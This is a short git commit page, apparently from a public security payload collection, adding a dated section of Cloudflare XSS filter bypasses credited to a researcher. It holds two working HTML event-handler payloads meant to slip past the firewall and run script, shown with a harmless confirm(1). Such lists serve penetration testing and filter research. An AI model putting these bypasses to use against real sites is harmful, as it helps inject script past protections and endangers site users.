Adding Cloudflare XSS payload

This commit is contained in:
Muhammad Daffa 2021-07-15 12:48:02 +07:00 committed by GitHub
parent 3f2f156c12
commit 2b6c3cb360
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1048,6 +1048,13 @@ Works for CSP like `script-src 'self' data:`
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 25st January 2021
```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```
#### 21st April 2020
```html